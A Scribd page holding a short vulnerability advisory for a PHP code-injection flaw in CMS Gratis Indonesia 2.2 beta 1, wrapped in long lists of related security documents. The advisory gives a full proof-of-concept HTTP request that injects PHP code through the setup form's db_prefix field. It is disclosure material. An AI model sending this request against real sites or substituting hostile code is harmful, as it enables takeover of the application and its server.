Welcome to Scribd!

Skip carousel

0% found this document useful (0 votes)

5 views

38547

Uploaded by

Abdul Wahid Kahar

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

Oscp Solutions - 16 Machines Unlocked
Document14 pages
Oscp Solutions - 16 Machines Unlocked
qzombexzombe114
No ratings yet
System Administrator Interview Questions and Answers PDF
Document14 pages
System Administrator Interview Questions and Answers PDF
Anonymous BbZceWkVn
67% (33)
Info Secutity
Document5 pages
Info Secutity
Daud Ahmed
No ratings yet
50669
Document6 pages
50669
Alone Boy
No ratings yet
Quick Report: Acunetix Security Audit
Document25 pages
Quick Report: Acunetix Security Audit
Cristian Ramirez
No ratings yet
Mass Pwnage Metasploit
Document27 pages
Mass Pwnage Metasploit
kapil_j
No ratings yet
625 Beter
Document59 pages
625 Beter
dzire5
No ratings yet
1.1 Problem Definition: 1.2.1 User Login
Document67 pages
1.1 Problem Definition: 1.2.1 User Login
Indrajeet Mishra
No ratings yet
Security
Document2 pages
Security
anonmax121
No ratings yet
Protocol-Level Evasion of Web Application Firewalls (Ivan Ristic, Qualys, Black Hat USA 2012) SLIDES
Document52 pages
Protocol-Level Evasion of Web Application Firewalls (Ivan Ristic, Qualys, Black Hat USA 2012) SLIDES
nieltalkx
No ratings yet
Comprehensive Report: Acunetix Threat Level 3
Document23 pages
Comprehensive Report: Acunetix Threat Level 3
bugtest
No ratings yet
Crossdomain XML
Document3 pages
Crossdomain XML
tarun.cyber14
No ratings yet
Browser Identification For Web Applications
Document16 pages
Browser Identification For Web Applications
Dhruv Jain
No ratings yet
Developer Report PDF
Document65 pages
Developer Report PDF
Anonymous JyKPfbZBQ
No ratings yet
5 Common Web Application Vulnerabilities
Document4 pages
5 Common Web Application Vulnerabilities
Anonymous Fhs3ufkC
No ratings yet
WXXBinarylog
Document2 pages
WXXBinarylog
yekohtet
No ratings yet
VSFTPD
Document3 pages
VSFTPD
yassine
No ratings yet
Qulalys Sample Report
Document6 pages
Qulalys Sample Report
eagleboy007
No ratings yet
10.denial of Service
Document20 pages
10.denial of Service
srihari reddy Kovvuri
No ratings yet
Internetandsecuritypaper
Document7 pages
Internetandsecuritypaper
magesh parthasarathy
No ratings yet
Answer
Document3 pages
Answer
kalango002
No ratings yet
SB04 133
Document55 pages
SB04 133
eliasnumira6284
No ratings yet
System Penetration With Metasploit Framework: Ajit Kumar Pradhan
Document5 pages
System Penetration With Metasploit Framework: Ajit Kumar Pradhan
Xman Returns
No ratings yet
Module 2 - Types of Attacks
Document14 pages
Module 2 - Types of Attacks
Fahmi Habibie
No ratings yet
20 Hacker Tricks For Attacking Web Apps
Document30 pages
20 Hacker Tricks For Attacking Web Apps
crosuperman1970
No ratings yet
Kumpulan Bug Telkomsel Juli 2015
Document3 pages
Kumpulan Bug Telkomsel Juli 2015
dhiTek
No ratings yet
HTB - Love - EN
Document19 pages
HTB - Love - EN
daemonyong
No ratings yet
Cross-Site Scripting (XSS) Attack Lab
Document9 pages
Cross-Site Scripting (XSS) Attack Lab
Hack Mania
No ratings yet
Attacking and Securing Unix FTP Servers
Document48 pages
Attacking and Securing Unix FTP Servers
chikulenka
No ratings yet
47439
Document3 pages
47439
abolfazl sheverin
No ratings yet
html2pdf SSRF Deserialization
Document4 pages
html2pdf SSRF Deserialization
Rio Rahmat
No ratings yet
Kls
Document5 pages
Kls
Novrya Benny
100% (2)
Code Generation Log
Document4,351 pages
Code Generation Log
Sreenivasulu Reddy Sanam
No ratings yet
PuTTY User Manual
Document579 pages
PuTTY User Manual
der Apfel
No ratings yet
Urlquery Target2x1
Document7 pages
Urlquery Target2x1
Thomas Scharrer
No ratings yet
Vulnerability #1: Stored Cross-Site Scripting - Password Tag
Document38 pages
Vulnerability #1: Stored Cross-Site Scripting - Password Tag
Satrio Saya
No ratings yet
VA Supporting Report
Document12 pages
VA Supporting Report
madamji
No ratings yet
CGI Programming: Phil Spector
Document25 pages
CGI Programming: Phil Spector
temp temp
No ratings yet
2-Establishing A Shell Through The Victim's Browser
Document12 pages
2-Establishing A Shell Through The Victim's Browser
Saw Gyi
No ratings yet
TagUI Enterprise Setup v1.7
Document3 pages
TagUI Enterprise Setup v1.7
funtikar
No ratings yet
Metasploit
Document26 pages
Metasploit
Deepak Prakash Jaya
No ratings yet
Host and Network Penetration Testing System Host Based Attacks
Document124 pages
Host and Network Penetration Testing System Host Based Attacks
Michael Michael
No ratings yet
Audit Report: Audited On December 02 2011
Document76 pages
Audit Report: Audited On December 02 2011
jhonhackodige
No ratings yet
Honey Bot User Guide
Document11 pages
Honey Bot User Guide
sara92712
No ratings yet
Host-Based Recommendations: 3. Limit Use of The Administrator Account
Document8 pages
Host-Based Recommendations: 3. Limit Use of The Administrator Account
voxpop51
No ratings yet
WXXBinarylog
Document4 pages
WXXBinarylog
Angsa Tanamal
No ratings yet
ITS 2 RST Sandbox DARPA PI Phoenix Jul99
Document22 pages
ITS 2 RST Sandbox DARPA PI Phoenix Jul99
Don Mlambo
No ratings yet
25 PHP Security Best Practices For SysAdmins
Document28 pages
25 PHP Security Best Practices For SysAdmins
rajmohan1976
No ratings yet
It-Essentials Chapter 12 Exam v6.0 2016
Document9 pages
It-Essentials Chapter 12 Exam v6.0 2016
Prayudha Lazuardi
No ratings yet
Using Group Policy Objects For Persistence and Lateral Movement
Document7 pages
Using Group Policy Objects For Persistence and Lateral Movement
Train Slow
No ratings yet
Cyberops Undip
Document5 pages
Cyberops Undip
alfah
57% (7)
Acunetix
Document72 pages
Acunetix
Varun
No ratings yet
Whip 01
Document14 pages
Whip 01
Sangeen Khan
No ratings yet
Hotspot Shield Elite Final + Crack: Posted by File-24 Labels: Views: 776
Document3 pages
Hotspot Shield Elite Final + Crack: Posted by File-24 Labels: Views: 776
Vincent Krayon Pardede
No ratings yet
Quiz 5 - M&S
Document2 pages
Quiz 5 - M&S
Nam Phuong Nguyen
No ratings yet
Comprehensive Guide On Metasploitable 2 Service Exploitation
Document24 pages
Comprehensive Guide On Metasploitable 2 Service Exploitation
AMAR SATAPPA CHAVAREKAR
No ratings yet
Deadly Sins Linux
Document10 pages
Deadly Sins Linux
Sushant Verma
No ratings yet
Common Windows, Linux and Web Server Systems Hacking Techniques
From Everand
Common Windows, Linux and Web Server Systems Hacking Techniques
Dr. Hidaia Mahmood Alassouli
No ratings yet
Hiding Web Traffic with SSH: How to Protect Your Internet Privacy against Corporate Firewall or Insecure Wireless
From Everand
Hiding Web Traffic with SSH: How to Protect Your Internet Privacy against Corporate Firewall or Insecure Wireless
Slava Gomzin
No ratings yet
Free Antivirus And Antimalware Software For Ubuntu & Linux Mint
From Everand
Free Antivirus And Antimalware Software For Ubuntu & Linux Mint
Cyber Jannah Studio
No ratings yet

38547

Uploaded by

Abdul Wahid Kahar

0% found this document useful (0 votes)

5 views1 page

Copyright

Available Formats

TXT, PDF, TXT or read online from Scribd

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Report this Document

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

Download as txt, pdf, or txt

0% found this document useful (0 votes)

5 views1 page

38547

Uploaded by

Abdul Wahid Kahar

Copyright:

Available Formats

Download as TXT, PDF, TXT or read online from Scribd

Flag for inappropriate content

Download as txt, pdf, or txt

Jump to Page

You are on page 1of 1

Search inside document

source: https://www.securityfocus.

com/bid/60337/info

CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.

An attacker can exploit this issue to inject and execute arbitrary PHP code in the
context of the affected application. This may facilitate a compromise of the
application and the underlying system; other attacks are also possible.

CMS Gratis Indonesia 2.2 beta 1 is vulnerable; other versions may also be affected.

POST /cmsid/?setup=yes HTTP/1.1

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101
Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.example.com/cmsid/?setup=yes
Cookie: __utma=111872281.1795322081.1369810583.1369810583.1369810583.1;
__utmz=111872281.1369810583.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
lang=en_US; PHPSESSID=gbf1u3p49bid3b1g4cnhuplco5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 140
hostname=localhost&mysql_user=root&mysql_pass=toor&mysql_db_name=cmsid&db_prefix=iw
_');phpinfo();//&step_1=Next+%C2%BB%C2%BB

Oscp Solutions - 16 Machines Unlocked
Document14 pages
Oscp Solutions - 16 Machines Unlocked
qzombexzombe114
No ratings yet
System Administrator Interview Questions and Answers PDF
Document14 pages
System Administrator Interview Questions and Answers PDF
Anonymous BbZceWkVn
67% (33)
Info Secutity
Document5 pages
Info Secutity
Daud Ahmed
No ratings yet
50669
Document6 pages
50669
Alone Boy
No ratings yet
Quick Report: Acunetix Security Audit
Document25 pages
Quick Report: Acunetix Security Audit
Cristian Ramirez
No ratings yet
Mass Pwnage Metasploit
Document27 pages
Mass Pwnage Metasploit
kapil_j
No ratings yet
625 Beter
Document59 pages
625 Beter
dzire5
No ratings yet
1.1 Problem Definition: 1.2.1 User Login
Document67 pages
1.1 Problem Definition: 1.2.1 User Login
Indrajeet Mishra
No ratings yet
Security
Document2 pages
Security
anonmax121
No ratings yet
Protocol-Level Evasion of Web Application Firewalls (Ivan Ristic, Qualys, Black Hat USA 2012) SLIDES
Document52 pages
Protocol-Level Evasion of Web Application Firewalls (Ivan Ristic, Qualys, Black Hat USA 2012) SLIDES
nieltalkx
No ratings yet
Comprehensive Report: Acunetix Threat Level 3
Document23 pages
Comprehensive Report: Acunetix Threat Level 3
bugtest
No ratings yet
Crossdomain XML
Document3 pages
Crossdomain XML
tarun.cyber14
No ratings yet
Browser Identification For Web Applications
Document16 pages
Browser Identification For Web Applications
Dhruv Jain
No ratings yet
Developer Report PDF
Document65 pages
Developer Report PDF
Anonymous JyKPfbZBQ
No ratings yet
5 Common Web Application Vulnerabilities
Document4 pages
5 Common Web Application Vulnerabilities
Anonymous Fhs3ufkC
No ratings yet
WXXBinarylog
Document2 pages
WXXBinarylog
yekohtet
No ratings yet
VSFTPD
Document3 pages
VSFTPD
yassine
No ratings yet
Qulalys Sample Report
Document6 pages
Qulalys Sample Report
eagleboy007
No ratings yet
10.denial of Service
Document20 pages
10.denial of Service
srihari reddy Kovvuri
No ratings yet
Internetandsecuritypaper
Document7 pages
Internetandsecuritypaper
magesh parthasarathy
No ratings yet
Answer
Document3 pages
Answer
kalango002
No ratings yet
SB04 133
Document55 pages
SB04 133
eliasnumira6284
No ratings yet
System Penetration With Metasploit Framework: Ajit Kumar Pradhan
Document5 pages
System Penetration With Metasploit Framework: Ajit Kumar Pradhan
Xman Returns
No ratings yet
Module 2 - Types of Attacks
Document14 pages
Module 2 - Types of Attacks
Fahmi Habibie
No ratings yet
20 Hacker Tricks For Attacking Web Apps
Document30 pages
20 Hacker Tricks For Attacking Web Apps
crosuperman1970
No ratings yet
Kumpulan Bug Telkomsel Juli 2015
Document3 pages
Kumpulan Bug Telkomsel Juli 2015
dhiTek
No ratings yet
HTB - Love - EN
Document19 pages
HTB - Love - EN
daemonyong
No ratings yet
Cross-Site Scripting (XSS) Attack Lab
Document9 pages
Cross-Site Scripting (XSS) Attack Lab
Hack Mania
No ratings yet
Attacking and Securing Unix FTP Servers
Document48 pages
Attacking and Securing Unix FTP Servers
chikulenka
No ratings yet
47439
Document3 pages
47439
abolfazl sheverin
No ratings yet
html2pdf SSRF Deserialization
Document4 pages
html2pdf SSRF Deserialization
Rio Rahmat
No ratings yet
Kls
Document5 pages
Kls
Novrya Benny
100% (2)
Code Generation Log
Document4,351 pages
Code Generation Log
Sreenivasulu Reddy Sanam
No ratings yet
PuTTY User Manual
Document579 pages
PuTTY User Manual
der Apfel
No ratings yet
Urlquery Target2x1
Document7 pages
Urlquery Target2x1
Thomas Scharrer
No ratings yet
Vulnerability #1: Stored Cross-Site Scripting - Password Tag
Document38 pages
Vulnerability #1: Stored Cross-Site Scripting - Password Tag
Satrio Saya
No ratings yet
VA Supporting Report
Document12 pages
VA Supporting Report
madamji
No ratings yet
CGI Programming: Phil Spector
Document25 pages
CGI Programming: Phil Spector
temp temp
No ratings yet
2-Establishing A Shell Through The Victim's Browser
Document12 pages
2-Establishing A Shell Through The Victim's Browser
Saw Gyi
No ratings yet
TagUI Enterprise Setup v1.7
Document3 pages
TagUI Enterprise Setup v1.7
funtikar
No ratings yet
Metasploit
Document26 pages
Metasploit
Deepak Prakash Jaya
No ratings yet
Host and Network Penetration Testing System Host Based Attacks
Document124 pages
Host and Network Penetration Testing System Host Based Attacks
Michael Michael
No ratings yet
Audit Report: Audited On December 02 2011
Document76 pages
Audit Report: Audited On December 02 2011
jhonhackodige
No ratings yet
Honey Bot User Guide
Document11 pages
Honey Bot User Guide
sara92712
No ratings yet
Host-Based Recommendations: 3. Limit Use of The Administrator Account
Document8 pages
Host-Based Recommendations: 3. Limit Use of The Administrator Account
voxpop51
No ratings yet
WXXBinarylog
Document4 pages
WXXBinarylog
Angsa Tanamal
No ratings yet
ITS 2 RST Sandbox DARPA PI Phoenix Jul99
Document22 pages
ITS 2 RST Sandbox DARPA PI Phoenix Jul99
Don Mlambo
No ratings yet
25 PHP Security Best Practices For SysAdmins
Document28 pages
25 PHP Security Best Practices For SysAdmins
rajmohan1976
No ratings yet
It-Essentials Chapter 12 Exam v6.0 2016
Document9 pages
It-Essentials Chapter 12 Exam v6.0 2016
Prayudha Lazuardi
No ratings yet
Using Group Policy Objects For Persistence and Lateral Movement
Document7 pages
Using Group Policy Objects For Persistence and Lateral Movement
Train Slow
No ratings yet
Cyberops Undip
Document5 pages
Cyberops Undip
alfah
57% (7)
Acunetix
Document72 pages
Acunetix
Varun
No ratings yet
Whip 01
Document14 pages
Whip 01
Sangeen Khan
No ratings yet
Hotspot Shield Elite Final + Crack: Posted by File-24 Labels: Views: 776
Document3 pages
Hotspot Shield Elite Final + Crack: Posted by File-24 Labels: Views: 776
Vincent Krayon Pardede
No ratings yet
Quiz 5 - M&S
Document2 pages
Quiz 5 - M&S
Nam Phuong Nguyen
No ratings yet
Comprehensive Guide On Metasploitable 2 Service Exploitation
Document24 pages
Comprehensive Guide On Metasploitable 2 Service Exploitation
AMAR SATAPPA CHAVAREKAR
No ratings yet
Deadly Sins Linux
Document10 pages
Deadly Sins Linux
Sushant Verma
No ratings yet
Common Windows, Linux and Web Server Systems Hacking Techniques
From Everand
Common Windows, Linux and Web Server Systems Hacking Techniques
Dr. Hidaia Mahmood Alassouli
No ratings yet
Hiding Web Traffic with SSH: How to Protect Your Internet Privacy against Corporate Firewall or Insecure Wireless
From Everand
Hiding Web Traffic with SSH: How to Protect Your Internet Privacy against Corporate Firewall or Insecure Wireless
Slava Gomzin
No ratings yet
Free Antivirus And Antimalware Software For Ubuntu & Linux Mint
From Everand
Free Antivirus And Antimalware Software For Ubuntu & Linux Mint
Cyber Jannah Studio
No ratings yet

38547

Uploaded by

Copyright:

Available Formats

You might also like

38547

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

38547

Uploaded by

Copyright:

Available Formats

source: https://www.securityfocus.

CMS Gratis Indonesia is prone to a remote PHP code-injection vulnerability.

POST /cmsid/?setup=yes HTTP/1.1

You might also like